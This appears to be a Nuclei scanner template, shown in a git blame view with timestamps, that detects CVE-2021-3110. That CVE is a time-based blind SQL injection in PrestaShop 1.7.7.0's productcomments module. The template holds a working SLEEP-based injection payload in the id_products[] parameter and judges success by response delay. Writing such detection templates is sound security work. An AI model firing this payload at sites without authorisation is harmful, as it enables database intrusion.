2021-02-18 05:13:09 +00:00
|
|
|
id: CVE-2021-3110
|
2021-02-17 20:27:08 +00:00
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: prestshop CMS SQL Injection
|
|
|
|
|
author: Jaimin Gondaliya
|
2021-02-18 05:13:09 +00:00
|
|
|
severity: critical
|
2021-02-17 20:27:08 +00:00
|
|
|
description: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
|
2021-02-18 05:13:09 +00:00
|
|
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
|
|
|
|
tags: cve,cve2021,sqli,prestshop
|
2021-02-17 20:27:08 +00:00
|
|
|
|
|
|
|
|
requests:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
2022-11-09 05:58:01 +00:00
|
|
|
- "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(7)))xoOt)"
|
|
|
|
|
|
2021-02-17 20:27:08 +00:00
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
|
|
|
|
- "average_grade"
|
|
|
|
|
part: body
|
2022-11-09 05:58:01 +00:00
|
|
|
|
|
|
|
|
- type: dsl
|
|
|
|
|
dsl:
|
|
|
|
|
- 'duration>=7'
|
2021-02-17 20:27:08 +00:00
|
|
|
- 200
|
